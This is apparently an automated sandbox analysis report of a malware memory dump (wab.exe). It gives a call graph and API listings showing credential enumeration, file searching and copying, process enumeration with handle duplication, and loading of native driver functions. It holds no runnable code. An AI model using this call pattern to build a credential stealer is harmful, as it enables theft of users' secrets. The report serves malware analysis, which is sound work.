38197 4110f7 _wcsicmp 38197->38199 38198 411157 38200 40ada2 _wcsicmp 38198->38200 38199->38194 38199->38197 38356 410c46 10 API calls 38199->38356 38203 411167 38200->38203 38201 4111af 38203->38201 38204 4111a6 qsort 38203->38204 38204->38201 38206->38198 38209->38004 38211 40eb10 38210->38211 38223 40e8e0 38211->38223 38214 40eb6c memcpy memcpy 38218 40ebb7 38214->38218 38215 40ebf2 ??2@YAPAXI ??2@YAPAXI 38217 40ec2e ??2@YAPAXI 38215->38217 38220 40ec65 38215->38220 38216 40d134 16 API calls 38216->38218 38217->38220 38218->38214 38218->38215 38218->38216 38220->38220 38233 40ea7f 38220->38233 38222 402f49 38222->38004 38224 40e8f2 38223->38224 38225 40e8eb ??3@YAXPAX 38223->38225 38226 40e900 38224->38226 38227 40e8f9 ??3@YAXPAX 38224->38227 38225->38224 38228 40e911 38226->38228 38229 40e90a ??3@YAXPAX 38226->38229 38227->38226 38230 40e931 ??2@YAPAXI ??2@YAPAXI 38228->38230 38231 40e921 ??3@YAXPAX 38228->38231 38232 40e92a ??3@YAXPAX 38228->38232 38229->38228 38230->38214 38231->38232 38232->38230 38234 40aa04 ??3@YAXPAX 38233->38234 38235 40ea88 38234->38235 38236 40aa04 ??3@YAXPAX 38235->38236 38237 40ea90 38236->38237 38238 40aa04 ??3@YAXPAX 38237->38238 38239 40ea98 38238->38239 38240 40aa04 ??3@YAXPAX 38239->38240 38241 40eaa0 38240->38241 38242 40a9ce 4 API calls 38241->38242 38243 40eab3 38242->38243 38244 40a9ce 4 API calls 38243->38244 38245 40eabd 38244->38245 38246 40a9ce 4 API calls 38245->38246 38247 40eac7 38246->38247 38248 40a9ce 4 API calls 38247->38248 38249 40ead1 38248->38249 38249->38222 38250->38180 38251->38184 38309 40b2cc 38252->38309 38254 402b0a 38255 40b2cc 27 API calls 38254->38255 38256 402b23 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402b3a 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402b54 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402b6b 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402b82 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402b99 38265->38266 
38267 40b2cc 27 API calls 38266->38267 38268 402bb0 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402bc7 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402bde 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402bf5 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402c0c 38275->38276 38277 40b2cc 27 API calls 38276->38277 38278 402c23 38277->38278 38279 40b2cc 27 API calls 38278->38279 38280 402c3a 38279->38280 38281 40b2cc 27 API calls 38280->38281 38282 402c51 38281->38282 38283 40b2cc 27 API calls 38282->38283 38284 402c68 38283->38284 38285 40b2cc 27 API calls 38284->38285 38286 402c7f 38285->38286 38287 40b2cc 27 API calls 38286->38287 38288 402c99 38287->38288 38289 40b2cc 27 API calls 38288->38289 38290 402cb3 38289->38290 38291 40b2cc 27 API calls 38290->38291 38292 402cd5 38291->38292 38293 40b2cc 27 API calls 38292->38293 38294 402cf0 38293->38294 38295 40b2cc 27 API calls 38294->38295 38296 402d0b 38295->38296 38297 40b2cc 27 API calls 38296->38297 38298 402d26 38297->38298 38299 40b2cc 27 API calls 38298->38299 38300 402d3e 38299->38300 38301 40b2cc 27 API calls 38300->38301 38302 402d59 38301->38302 38303 40b2cc 27 API calls 38302->38303 38304 402d78 38303->38304 38305 40b2cc 27 API calls 38304->38305 38306 402d93 38305->38306 38307 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38306->38307 38307->38188 38308->38178 38312 40b58d 38309->38312 38311 40b2d1 38311->38254 38313 40b5a4 GetModuleHandleW FindResourceW 38312->38313 38314 40b62e 38312->38314 38315 40b5c2 LoadResource 38313->38315 38317 40b5e7 38313->38317 38314->38311 38316 40b5d0 SizeofResource LockResource 38315->38316 38315->38317 38316->38317 38317->38314 38325 40afcf 38317->38325 38319 40b608 memcpy 38328 40b4d3 memcpy 38319->38328 38321 40b61e 38329 40b3c1 18 API calls 38321->38329 38323 40b626 38330 40b04b 38323->38330 38326 40b04b ??3@YAXPAX 38325->38326 38327 40afd7 ??2@YAPAXI 38326->38327 38327->38319 
38328->38321 38329->38323 38331 40b051 ??3@YAXPAX 38330->38331 38332 40b05f 38330->38332 38331->38332 38332->38314 38333->38196 38335 4032c4 38334->38335 38336 40b633 ??3@YAXPAX 38335->38336 38337 403316 38336->38337 38357 44553b 38337->38357 38341 403480 38553 40368c 15 API calls 38341->38553 38343 403489 38344 40b633 ??3@YAXPAX 38343->38344 38345 403495 38344->38345 38345->38198 38346 4033a9 memset memcpy 38347 4033ec wcscmp 38346->38347 38348 40333c 38346->38348 38347->38348 38348->38341 38348->38346 38348->38347 38551 4028e7 11 API calls 38348->38551 38552 40f508 6 API calls 38348->38552 38350 403421 _wcsicmp 38350->38348 38352->38198 38354 444a64 FreeLibrary 38353->38354 38355 444a83 38353->38355 38354->38355 38355->38198 38356->38199 38358 445548 38357->38358 38359 445599 38358->38359 38554 40c768 38358->38554 38360 4455a8 memset 38359->38360 38367 4457f2 38359->38367 38637 403988 38360->38637 38370 445854 38367->38370 38739 403e2d memset memset memset memset memset 38367->38739 38368 4458bb memset memset 38374 414c2e 16 API calls 38368->38374 38420 4458aa 38370->38420 38762 403c9c memset memset memset memset memset 38370->38762 38372 44595e memset memset 38380 414c2e 16 API calls 38372->38380 38373 4455e5 38377 445672 38373->38377 38383 44560f 38373->38383 38375 4458f9 38374->38375 38381 40b2cc 27 API calls 38375->38381 38648 403fbe memset memset memset memset memset 38377->38648 38378 445a00 memset memset 38785 414c2e 38378->38785 38379 445b22 38385 445bca 38379->38385 38386 445b38 memset memset memset 38379->38386 38390 44599c 38380->38390 38391 445909 38381->38391 38382 44557a 38417 44558c 38382->38417 38834 41366b FreeLibrary 38382->38834 38394 4087b3 338 API calls 38383->38394 38384 445849 38849 40b1ab ??3@YAXPAX ??3@YAXPAX 38384->38849 38392 445c8b memset memset 38385->38392 38459 445cf0 38385->38459 38395 445bd4 38386->38395 38396 445b98 38386->38396 38399 40b2cc 27 API calls 38390->38399 38400 409d1f 6 API calls 38391->38400 38404 414c2e 16 API calls 
38392->38404 38393 44589f 38850 40b1ab ??3@YAXPAX ??3@YAXPAX 38393->38850 38401 445621 38394->38401 38410 414c2e 16 API calls 38395->38410 38396->38395 38406 445ba2 38396->38406 38403 4459ac 38399->38403 38414 445919 38400->38414 38835 4454bf 20 API calls 38401->38835 38402 445823 38402->38384 38425 4087b3 338 API calls 38402->38425 38415 409d1f 6 API calls 38403->38415 38416 445cc9 38404->38416 38923 4099c6 wcslen 38406->38923 38407 4456b2 38837 40b1ab ??3@YAXPAX ??3@YAXPAX 38407->38837 38409 40b2cc 27 API calls 38421 445a4f 38409->38421 38423 445be2 38410->38423 38411 403335 38550 4452e5 45 API calls 38411->38550 38412 445d3d 38443 40b2cc 27 API calls 38412->38443 38413 445d88 memset memset memset 38426 414c2e 16 API calls 38413->38426 38851 409b98 GetFileAttributesW 38414->38851 38427 4459bc 38415->38427 38428 409d1f 6 API calls 38416->38428 38621 444b06 38417->38621 38418 445879 38418->38393 38439 4087b3 338 API calls 38418->38439 38420->38368 38444 44594a 38420->38444 38800 409d1f wcslen wcslen 38421->38800 38432 40b2cc 27 API calls 38423->38432 38425->38402 38436 445dde 38426->38436 38919 409b98 GetFileAttributesW 38427->38919 38438 445ce1 38428->38438 38429 445bb3 38926 445403 memset 38429->38926 38430 445680 38430->38407 38671 4087b3 memset 38430->38671 38433 445bf3 38432->38433 38442 409d1f 6 API calls 38433->38442 38434 445928 38434->38444 38852 40b6ef 38434->38852 38445 40b2cc 27 API calls 38436->38445 38943 409b98 GetFileAttributesW 38438->38943 38439->38418 38453 445c07 38442->38453 38454 445d54 _wcsicmp 38443->38454 38444->38372 38458 4459ed 38444->38458 38457 445def 38445->38457 38446 4459cb 38446->38458 38467 40b6ef 252 API calls 38446->38467 38450 40b2cc 27 API calls 38451 445a94 38450->38451 38805 40ae18 38451->38805 38452 44566d 38452->38367 38722 413d4c 38452->38722 38463 445389 258 API calls 38453->38463 38464 445d71 38454->38464 38529 445d67 38454->38529 38456 445665 38836 40b1ab ??3@YAXPAX ??3@YAXPAX 38456->38836 38465 409d1f 6 API calls 
38457->38465 38458->38378 38458->38379 38459->38411 38459->38412 38459->38413 38460 445389 258 API calls 38460->38385 38469 445c17 38463->38469 38944 445093 23 API calls 38464->38944 38472 445e03 38465->38472 38467->38458 38468 4456d8 38474 40b2cc 27 API calls 38468->38474 38475 40b2cc 27 API calls 38469->38475 38471 44563c 38471->38456 38477 4087b3 338 API calls 38471->38477 38945 409b98 GetFileAttributesW 38472->38945 38473 40b6ef 252 API calls 38473->38411 38479 4456e2 38474->38479 38480 445c23 38475->38480 38476 445d83 38476->38411 38477->38471 38838 413fa6 _wcsicmp _wcsicmp 38479->38838 38484 409d1f 6 API calls 38480->38484 38482 445e12 38489 445e6b 38482->38489 38495 40b2cc 27 API calls 38482->38495 38487 445c37 38484->38487 38485 445aa1 38488 445b17 38485->38488 38503 445ab2 memset 38485->38503 38516 409d1f 6 API calls 38485->38516 38812 40add4 38485->38812 38817 445389 38485->38817 38826 40ae51 38485->38826 38486 4456eb 38491 4456fd memset memset memset memset 38486->38491 38492 4457ea 38486->38492 38493 445389 258 API calls 38487->38493 38920 40aebe 38488->38920 38947 445093 23 API calls 38489->38947 38839 409c70 wcscpy wcsrchr 38491->38839 38842 413d29 38492->38842 38498 445c47 38493->38498 38499 445e33 38495->38499 38505 40b2cc 27 API calls 38498->38505 38506 409d1f 6 API calls 38499->38506 38501 445e7e 38502 445f67 38501->38502 38511 40b2cc 27 API calls 38502->38511 38507 40b2cc 27 API calls 38503->38507 38509 445c53 38505->38509 38510 445e47 38506->38510 38507->38485 38508 409c70 2 API calls 38512 44577e 38508->38512 38513 409d1f 6 API calls 38509->38513 38946 409b98 GetFileAttributesW 38510->38946 38515 445f73 38511->38515 38517 409c70 2 API calls 38512->38517 38518 445c67 38513->38518 38520 409d1f 6 API calls 38515->38520 38516->38485 38521 44578d 38517->38521 38522 445389 258 API calls 38518->38522 38519 445e56 38519->38489 38525 445e83 memset 38519->38525 38523 445f87 38520->38523 38521->38492 38528 40b2cc 27 API calls 38521->38528 38522->38385 
38950 409b98 GetFileAttributesW 38523->38950 38527 40b2cc 27 API calls 38525->38527 38530 445eab 38527->38530 38531 4457a8 38528->38531 38529->38411 38529->38473 38532 409d1f 6 API calls 38530->38532 38533 409d1f 6 API calls 38531->38533 38534 445ebf 38532->38534 38535 4457b8 38533->38535 38536 40ae18 9 API calls 38534->38536 38841 409b98 GetFileAttributesW 38535->38841 38546 445ef5 38536->38546 38538 4457c7 38538->38492 38540 4087b3 338 API calls 38538->38540 38539 40ae51 9 API calls 38539->38546 38540->38492 38541 445f5c 38543 40aebe FindClose 38541->38543 38542 40add4 2 API calls 38542->38546 38543->38502 38544 40b2cc 27 API calls 38544->38546 38545 409d1f 6 API calls 38545->38546 38546->38539 38546->38541 38546->38542 38546->38544 38546->38545 38548 445f3a 38546->38548 38948 409b98 GetFileAttributesW 38546->38948 38949 445093 23 API calls 38548->38949 38550->38348 38551->38350 38552->38348 38553->38343 38555 40c775 38554->38555 38951 40b1ab ??3@YAXPAX ??3@YAXPAX 38555->38951 38557 40c788 38952 40b1ab ??3@YAXPAX ??3@YAXPAX 38557->38952 38559 40c790 38953 40b1ab ??3@YAXPAX ??3@YAXPAX 38559->38953 38561 40c798 38562 40aa04 ??3@YAXPAX 38561->38562 38563 40c7a0 38562->38563 38954 40c274 memset 38563->38954 38568 40a8ab 9 API calls 38569 40c7c3 38568->38569 38570 40a8ab 9 API calls 38569->38570 38571 40c7d0 38570->38571 38983 40c3c3 38571->38983 38575 40c7e5 38576 40c877 38575->38576 38577 40c86c 38575->38577 38583 40c634 49 API calls 38575->38583 39008 40a706 38575->39008 38584 40bdb0 38576->38584 39025 4053fe 39 API calls 38577->39025 38583->38575 39215 404363 38584->39215 38587 40bf5d 39235 40440c 38587->39235 38589 40bdee 38589->38587 38592 40b2cc 27 API calls 38589->38592 38590 40bddf CredEnumerateW 38590->38589 38593 40be02 wcslen 38592->38593 38593->38587 38600 40be1e 38593->38600 38594 40be26 _wcsncoll 38594->38600 38597 40be7d memset 38598 40bea7 memcpy 38597->38598 38597->38600 38599 40bf11 wcschr 38598->38599 38598->38600 38599->38600 38600->38587 
38600->38594 38600->38597 38600->38598 38600->38599 38601 40b2cc 27 API calls 38600->38601 38603 40bf43 LocalFree 38600->38603 39238 40bd5d 28 API calls 38600->39238 39239 404423 38600->39239 38602 40bef6 _wcsnicmp 38601->38602 38602->38599 38602->38600 38603->38600 38604 4135f7 39252 4135e0 38604->39252 38607 40b2cc 27 API calls 38608 41360d 38607->38608 38609 40a804 8 API calls 38608->38609 38610 413613 38609->38610 38611 41361b 38610->38611 38612 41363e 38610->38612 38613 40b273 27 API calls 38611->38613 38614 4135e0 FreeLibrary 38612->38614 38615 413625 GetProcAddress 38613->38615 38616 413643 38614->38616 38615->38612 38617 413648 38615->38617 38616->38382 38618 413658 38617->38618 38619 4135e0 FreeLibrary 38617->38619 38618->38382 38620 413666 38619->38620 38620->38382 39255 4449b9 38621->39255 38624 444c1f 38624->38359 38625 4449b9 42 API calls 38627 444b4b 38625->38627 38626 444c15 38629 4449b9 42 API calls 38626->38629 38627->38626 39276 444972 GetVersionExW 38627->39276 38629->38624 38630 444b99 memcmp 38635 444b8c 38630->38635 38631 444c0b 39280 444a85 42 API calls 38631->39280 38635->38630 38635->38631 39277 444aa5 42 API calls 38635->39277 39278 40a7a0 GetVersionExW 38635->39278 39279 444a85 42 API calls 38635->39279 38638 40399d 38637->38638 39281 403a16 38638->39281 38640 403a09 39295 40b1ab ??3@YAXPAX ??3@YAXPAX 38640->39295 38642 403a12 wcsrchr 38642->38373 38643 4039a3 38643->38640 38646 4039f4 38643->38646 39292 40a02c CreateFileW 38643->39292 38646->38640 38647 4099c6 2 API calls 38646->38647 38647->38640 38649 414c2e 16 API calls 38648->38649 38650 404048 38649->38650 38651 414c2e 16 API calls 38650->38651 38652 404056 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 404073 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 40408e 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 4040a6 38657->38658 38659 403af5 20 API calls 38658->38659 38660 4040ba 38659->38660 38661 403af5 20 API calls 38660->38661 38662 4040cb 
38661->38662 39322 40414f memset 38662->39322 38664 404140 39336 40b1ab ??3@YAXPAX ??3@YAXPAX 38664->39336 38666 4040ec memset 38669 4040e0 38666->38669 38667 404148 38667->38430 38668 4099c6 2 API calls 38668->38669 38669->38664 38669->38666 38669->38668 38670 40a8ab 9 API calls 38669->38670 38670->38669 39349 40a6e6 WideCharToMultiByte 38671->39349 38673 4087ed 39350 4095d9 memset 38673->39350 38676 408953 38676->38430 38677 408809 memset memset memset memset memset 38678 40b2cc 27 API calls 38677->38678 38679 4088a1 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 4088b1 38680->38681 38682 40b2cc 27 API calls 38681->38682 38683 4088c0 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 4088d0 38684->38685 38686 40b2cc 27 API calls 38685->38686 38687 4088df 38686->38687 38688 409d1f 6 API calls 38687->38688 38689 4088ef 38688->38689 38690 40b2cc 27 API calls 38689->38690 38691 4088fe 38690->38691 38692 409d1f 6 API calls 38691->38692 38693 40890e 38692->38693 38694 40b2cc 27 API calls 38693->38694 38695 40891d 38694->38695 38696 409d1f 6 API calls 38695->38696 38697 40892d 38696->38697 39369 409b98 GetFileAttributesW 38697->39369 38699 40893e 38700 408943 38699->38700 38701 408958 38699->38701 38723 40b633 ??3@YAXPAX 38722->38723 38724 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38723->38724 38725 413f00 Process32NextW 38724->38725 38726 413da5 OpenProcess 38725->38726 38727 413f17 CloseHandle 38725->38727 38728 413df3 memset 38726->38728 38731 413eb0 38726->38731 38727->38468 39685 413f27 38728->39685 38730 413ebf ??3@YAXPAX 38730->38731 38731->38725 38731->38730 38732 4099f4 3 API calls 38731->38732 38732->38731 38734 413e37 GetModuleHandleW 38735 413e1f 38734->38735 38736 413e46 GetProcAddress 38734->38736 38735->38734 39690 413959 38735->39690 39706 413ca4 38735->39706 38736->38735 38738 413ea2 CloseHandle 38738->38731 38740 414c2e 16 API calls 38739->38740 38741 403eb7 38740->38741 38742 414c2e 16 API calls 38741->38742 38743 403ec5 
38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403ee2 38744->38745 38746 409d1f 6 API calls 38745->38746 38747 403efd 38746->38747 38748 409d1f 6 API calls 38747->38748 38749 403f15 38748->38749 38750 403af5 20 API calls 38749->38750 38751 403f29 38750->38751 38752 403af5 20 API calls 38751->38752 38753 403f3a 38752->38753 38754 40414f 33 API calls 38753->38754 38755 403f4f 38754->38755 38756 403faf 38755->38756 38758 403f5b memset 38755->38758 38760 4099c6 2 API calls 38755->38760 38761 40a8ab 9 API calls 38755->38761 39720 40b1ab ??3@YAXPAX ??3@YAXPAX 38756->39720 38758->38755 38759 403fb7 38759->38402 38760->38755 38761->38755 38763 414c2e 16 API calls 38762->38763 38764 403d26 38763->38764 38765 414c2e 16 API calls 38764->38765 38766 403d34 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403d51 38767->38768 38769 409d1f 6 API calls 38768->38769 38770 403d6c 38769->38770 38771 409d1f 6 API calls 38770->38771 38772 403d84 38771->38772 38773 403af5 20 API calls 38772->38773 38774 403d98 38773->38774 38775 403af5 20 API calls 38774->38775 38776 403da9 38775->38776 38777 40414f 33 API calls 38776->38777 38778 403dbe 38777->38778 38779 403e1e 38778->38779 38780 403dca memset 38778->38780 38783 4099c6 2 API calls 38778->38783 38784 40a8ab 9 API calls 38778->38784 39721 40b1ab ??3@YAXPAX ??3@YAXPAX 38779->39721 38780->38778 38782 403e26 38782->38418 38783->38778 38784->38778 38786 414b81 9 API calls 38785->38786 38787 414c40 38786->38787 38788 414c73 memset 38787->38788 39722 409cea 38787->39722 38789 414c94 38788->38789 39725 414592 RegOpenKeyExW 38789->39725 38792 414c64 38792->38409 38794 414cc1 38795 414cf4 wcscpy 38794->38795 39726 414bb0 wcscpy 38794->39726 38795->38792 38797 414cd2 39727 4145ac RegQueryValueExW 38797->39727 38799 414ce9 RegCloseKey 38799->38795 38801 409d62 38800->38801 38802 409d43 wcscpy 38800->38802 38801->38450 38803 409719 2 API calls 38802->38803 38804 409d51 wcscat 38803->38804 38804->38801 38806 40aebe FindClose 
38805->38806 38807 40ae21 38806->38807 38808 4099c6 2 API calls 38807->38808 38809 40ae35 38808->38809 38810 409d1f 6 API calls 38809->38810 38811 40ae49 38810->38811 38811->38485 38813 40ade0 38812->38813 38814 40ae0f 38812->38814 38813->38814 38815 40ade7 wcscmp 38813->38815 38814->38485 38815->38814 38816 40adfe wcscmp 38815->38816 38816->38814 38818 40ae18 9 API calls 38817->38818 38820 4453c4 38818->38820 38819 40ae51 9 API calls 38819->38820 38820->38819 38821 4453f3 38820->38821 38822 40add4 2 API calls 38820->38822 38825 445403 253 API calls 38820->38825 38823 40aebe FindClose 38821->38823 38822->38820 38824 4453fe 38823->38824 38824->38485 38825->38820 38827 40ae7b FindNextFileW 38826->38827 38828 40ae5c FindFirstFileW 38826->38828 38829 40ae94 38827->38829 38830 40ae8f 38827->38830 38828->38829 38832 40aeb6 38829->38832 38833 409d1f 6 API calls 38829->38833 38831 40aebe FindClose 38830->38831 38831->38829 38832->38485 38833->38832 38834->38417 38835->38471 38836->38452 38837->38452 38838->38486 38840 409c89 38839->38840 38840->38508 38841->38538 38843 413d39 38842->38843 38844 413d2f FreeLibrary 38842->38844 38845 40b633 ??3@YAXPAX 38843->38845 38844->38843 38846 413d42 38845->38846 38847 40b633 ??3@YAXPAX 38846->38847 38848 413d4a 38847->38848 38848->38367 38849->38370 38850->38420 38851->38434 38853 44db70 38852->38853 38854 40b6fc memset 38853->38854 38855 409c70 2 API calls 38854->38855 38856 40b732 wcsrchr 38855->38856 38857 40b743 38856->38857 38858 40b746 memset 38856->38858 38857->38858 38859 40b2cc 27 API calls 38858->38859 38860 40b76f 38859->38860 38861 409d1f 6 API calls 38860->38861 38862 40b783 38861->38862 39728 409b98 GetFileAttributesW 38862->39728 38864 40b792 38865 40b7c2 38864->38865 38866 409c70 2 API calls 38864->38866 39729 40bb98 38865->39729 38868 40b7a5 38866->38868 38870 40b2cc 27 API calls 38868->38870 38874 40b7b2 38870->38874 38871 40b837 FindCloseChangeNotification 38873 40b83e memset 38871->38873 38872 40b817 39781 409a45 
GetTempPathW 38872->39781 39762 40a6e6 WideCharToMultiByte 38873->39762 38877 409d1f 6 API calls 38874->38877 38877->38865 38878 40b827 CopyFileW 38878->38873 38879 40b866 38880 444432 121 API calls 38879->38880 38881 40b879 38880->38881 38882 40bad5 38881->38882 38883 40b273 27 API calls 38881->38883 38884 40baeb 38882->38884 38885 40bade DeleteFileW 38882->38885 38886 40b89a 38883->38886 38887 40b04b ??3@YAXPAX 38884->38887 38885->38884 38888 438552 134 API calls 38886->38888 38889 40baf3 38887->38889 38890 40b8a4 38888->38890 38889->38444 38891 40bacd 38890->38891 38893 4251c4 137 API calls 38890->38893 38892 443d90 111 API calls 38891->38892 38892->38882 38916 40b8b8 38893->38916 38894 40bac6 39788 424f26 123 API calls 38894->39788 38895 40b8bd memset 39763 425413 38895->39763 38898 425413 17 API calls 38898->38916 38901 40a71b MultiByteToWideChar 38901->38916 38902 40a734 MultiByteToWideChar 38902->38916 38903 4253af 17 API calls 38903->38916 38904 4253cf 17 API calls 38904->38916 38905 40b9b5 memcmp 38905->38916 38906 4099c6 2 API calls 38906->38916 38907 404423 37 API calls 38907->38916 38909 40bb3e memset memcpy 39789 40a734 MultiByteToWideChar 38909->39789 38910 4251c4 137 API calls 38910->38916 38913 40bb88 LocalFree 38913->38916 38916->38894 38916->38895 38916->38898 38916->38901 38916->38902 38916->38903 38916->38904 38916->38905 38916->38906 38916->38907 38916->38909 38916->38910 38917 40ba5f memcmp 38916->38917 38918 4099f4 3 API calls 38916->38918 39770 4253ef 38916->39770 39775 40b64c 38916->39775 39784 447280 memset 38916->39784 39785 447960 memset memcpy memcpy memcpy 38916->39785 39786 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38916->39786 39787 447920 memcpy memcpy memcpy 38916->39787 38917->38916 38918->38916 38919->38446 38921 40aed1 38920->38921 38922 40aec7 FindClose 38920->38922 38921->38379 38922->38921 38924 4099d7 38923->38924 38925 4099da memcpy 38923->38925 38924->38925 38925->38429 38927 40b2cc 27 API calls 38926->38927 38928 44543f 

APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 594330280-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 912665193-1740548384
• Opcode ID: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
• Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
• Opcode Fuzzy Hash: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
• Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT ref: 0040B60D
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
• Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
• memset.MSVCRT ref: 00406F8B
• ??3@YAXPAX@Z.MSVCRT ref: 00407082
  • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
Memory Dump Source
